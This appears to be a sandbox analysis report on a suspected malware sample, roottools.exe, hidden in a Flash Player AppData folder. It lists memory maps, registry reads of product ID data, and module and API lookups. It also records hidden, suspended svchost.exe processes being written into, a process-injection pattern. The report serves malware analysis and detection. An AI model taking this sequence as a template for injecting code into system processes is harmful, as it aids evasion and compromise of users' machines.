private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0028ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000290000	0x00290000	0x002fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000290000	0x00290000	0x0029ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000002a0000	0x002a0000	0x002a6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000002b0000	0x002b0000	0x002b1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000002c0000	0x002c0000	0x002c7fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000002d0000	0x002d0000	0x002d0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000002f0000	0x002f0000	0x002fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000300000	0x00300000	0x003fffff	Private Memory	Readable, Writable	Region Actions
roottools.exe	0x00400000	0x00432fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000400000	0x00400000	0x0041bfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000440000	0x00440000	0x004effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000440000	0x00440000	0x0047ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004b0000	0x004b0000	0x004effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000510000	0x00510000	0x0051ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000520000	0x00520000	0x006a7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006b0000	0x006b0000	0x00830fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000840000	0x00840000	0x01c3ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001c40000	0x01c40000	0x01d3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001c40000	0x01c40000	0x01d1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001c40000	0x01c40000	0x01cbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ce0000	0x01ce0000	0x01d1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001d30000	0x01d30000	0x01d3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001d40000	0x01d40000	0x0213ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x02140000	0x0240efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002410000	0x02410000	0x0263ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002410000	0x02410000	0x024eefff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000024f0000	0x024f0000	0x025effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002600000	0x02600000	0x0263ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002640000	0x02640000	0x02a32fff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x02a40000	0x0336ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000003370000	0x03370000	0x0349ffff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x03370000	0x033abfff	Memory Mapped File	Readable	Region Actions
private_0x0000000003460000	0x03460000	0x0349ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000034a0000	0x034a0000	0x0b49ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000000000b4a0000	0x0b4a0000	0x0b5effff	Private Memory	Readable, Writable	Region Actions
msvbvm60.dll	0x72940000	0x72a92fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sxs.dll	0x74010000	0x7406efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x74130000	0x74142fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x741b0000	0x7422ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x743d0000	0x743d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x743e0000	0x7443bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74440000	0x7447efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x75630000	0x7566afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x75670000	0x75685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x75690000	0x75697fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc.dll	0x756a0000	0x756b1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x756c0000	0x756c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x756d0000	0x756ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75800000	0x7580bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75810000	0x7586ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x758c0000	0x759bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759c0000	0x75acffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x75ad0000	0x75ad4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75ae0000	0x75c3bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75c40000	0x75e3afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75f20000	0x76014fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x760b0000	0x7610ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76110000	0x761acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x761b0000	0x7623efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x76240000	0x7635cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x76360000	0x7636bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76370000	0x763c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76570000	0x7663bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76640000	0x76685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76690000	0x767c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x767d0000	0x767e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x767f0000	0x767f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76800000	0x768effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x768f0000	0x768f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76950000	0x769dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76a70000	0x776b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77740000	0x777dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x777e0000	0x77814fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000778b0000	0x778b0000	0x779a9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000779b0000	0x779b0000	0x77acefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77ad0000	0x77c78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77cb0000	0x77e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (8)

Operation	Filename	Additional Information	Count	Logfile
Create	\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Get Info	\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	type = extended	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Registry (6)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = DigitalProductId	1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	os_pid = 0x320, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE		1	Fn
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	os_pid = 0x7f8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE		1	Fn

Thread (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY		1	Fn
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY		1	Fn

Memory (10)

Operation	Process	Additional Information	Count	Logfile
Allocate	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
Allocate	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, size = 114688	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x876c4, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x877d0, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x87d38, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, size = 114688	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x876c4, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x877d0, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x87d38, size = 4	1	Fn Data

Module (567)

Operation	Module	Additional Information	Count	Logfile
Load	OLEAUT32.DLL	base_address = 0x761b0000	1	Fn
Load	SXS.DLL	base_address = 0x74010000	1	Fn
Load	KERNEL32	base_address = 0x759c0000	1	Fn
Load	kernel32	base_address = 0x759c0000	15	Fn
Load	shell32	base_address = 0x76a70000	2	Fn
Load	NTDLL	base_address = 0x77cb0000	1	Fn
Load	user32	base_address = 0x758c0000	3	Fn
Load	ntdll	base_address = 0x77cb0000	2	Fn
Load	IPHlpApi	base_address = 0x756d0000	1	Fn
Load	User32	base_address = 0x758c0000	1	Fn
Load	KERNEL32.dll	base_address = 0x759c0000	101	Fn
Load	USER32.dll	base_address = 0x758c0000	19	Fn
Load	CRYPT32.dll	base_address = 0x76240000	2	Fn
Load	ADVAPI32.dll	base_address = 0x77740000	39	Fn
Load	SHELL32.dll	base_address = 0x76a70000	3	Fn
Load	SHLWAPI.dll	base_address = 0x76370000	20	Fn
Load	PSAPI.DLL	base_address = 0x75ad0000	1	Fn
Load	ole32.dll	base_address = 0x75ae0000	6	Fn
Load	GDI32.dll	base_address = 0x76950000	8	Fn
Load	WININET.dll	base_address = 0x75f20000	10	Fn
Load	urlmon.dll	base_address = 0x76690000	1	Fn
Load	OLEAUT32.dll	base_address = 0x761b0000	1	Fn
Load	Secur32.dll	base_address = 0x75690000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x759c0000	2	Fn
Get Handle	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	base_address = 0x400000	2	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x761b0000	1	Fn
Get Handle	c:\windows\syswow64\ole32.dll	base_address = 0x75ae0000	1	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x758c0000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77cb0000	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	3	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	3	Fn
Get Filename	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsTNT, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x759d5235	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = OleLoadPictureEx, address_out = 0x762170a1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = DispCallFunc, address_out = 0x761c3dcf	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = LoadTypeLibEx, address_out = 0x761c07b7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = UnRegisterTypeLib, address_out = 0x761e1ca9	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = CreateTypeLib2, address_out = 0x761c8e70	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDateFromUdate, address_out = 0x761c7684	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarUdateFromDate, address_out = 0x761ccc98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetAltMonthNames, address_out = 0x761f903a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNumFromParseNum, address_out = 0x761c6231	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarParseNumFromStr, address_out = 0x761c5fea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR4, address_out = 0x761d3f94	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR8, address_out = 0x761d4e9e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromDate, address_out = 0x761fdb72	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromI4, address_out = 0x761e2a8c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromCy, address_out = 0x761fd737	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR4FromDec, address_out = 0x761fe015	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromGuids, address_out = 0x761fd1c4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetRecordInfo, address_out = 0x761fd48c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetRecordInfo, address_out = 0x761fd4c6	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetIID, address_out = 0x761fd509	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetIID, address_out = 0x761ce7bb	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCopyData, address_out = 0x761ce496	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCreateEx, address_out = 0x761fd53f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormat, address_out = 0x76202055	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatDateTime, address_out = 0x762020ea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatNumber, address_out = 0x76202151	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatPercent, address_out = 0x762021f5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatCurrency, address_out = 0x76202288	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarWeekdayName, address_out = 0x76202335	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMonthName, address_out = 0x762023d5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAdd, address_out = 0x761d5934	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAnd, address_out = 0x761d5a98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCat, address_out = 0x761d59b4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDiv, address_out = 0x7622e405	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarEqv, address_out = 0x7622ef07	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarIdiv, address_out = 0x7622f00a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarImp, address_out = 0x7622ef47	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMod, address_out = 0x7622f15e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMul, address_out = 0x7622dbd4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarOr, address_out = 0x7622ecfa	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarPow, address_out = 0x7622ea66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarSub, address_out = 0x7622d332	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarXor, address_out = 0x7622ee2e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAbs, address_out = 0x7622ca11	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFix, address_out = 0x7622cc5f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarInt, address_out = 0x7622cde7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNeg, address_out = 0x7622c802	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNot, address_out = 0x7622ec66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarRound, address_out = 0x7622d155	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCmp, address_out = 0x761cb0dc	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecAdd, address_out = 0x761e5f3e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecCmp, address_out = 0x761d4fd0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCat, address_out = 0x761d0d2c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCyMulI4, address_out = 0x761e59ed	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCmp, address_out = 0x761bf8b8	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstanceEx, address_out = 0x75b29d4e	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x75af0782	1	Fn
Get Address	c:\windows\syswow64\sxs.dll	function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74057685	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x758d7d2f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromWindow, address_out = 0x758e3150	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromRect, address_out = 0x758fe7a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromPoint, address_out = 0x758e5281	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumDisplayMonitors, address_out = 0x758e451a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMonitorInfoA, address_out = 0x758e4413	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadProcessMemory, address_out = 0x759ecfcc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumResourceTypesA, address_out = 0x75a50efd	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = Shell_NotifyIconA, address_out = 0x76cb8af2	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = ZwSetInformationProcess, address_out = 0x77ccfb18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x759d10ff	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetDesktopWindow, address_out = 0x758e0a19	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77cde026	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x759d11a9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x759d1b00	2	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtYieldExecution, address_out = 0x77ccff2c	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtProtectVirtualMemory, address_out = 0x77cd0028	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x759d53c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x759d1282	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x759d1410	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x759d3ed3	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x759d196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnmapViewOfFile, address_out = 0x759d1826	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtectEx, address_out = 0x75a545bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLongPathNameA, address_out = 0x75a5437f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x759ed802	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x756d9263	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x759ed9b0	2	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76cb7078	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumWindows, address_out = 0x758dd1cf	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x758d9a55	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumThreadWindows, address_out = 0x758e3961	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x759d7a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x759d49d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x759d89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77cf1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x759e10b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x759d34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x759d35b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x759d2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ce45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x759ddd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x759d14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x759d5a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x759fd4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x759d103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x759d170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x759d1400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x759d5a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x759ed9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x759fd075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x759ed5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x759d5151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x759ece2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x759d17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x759d469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x759d1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x759d1ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x759d1886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x759d1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x77d2742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x759d7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x759d11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x759f830d	1	Fn
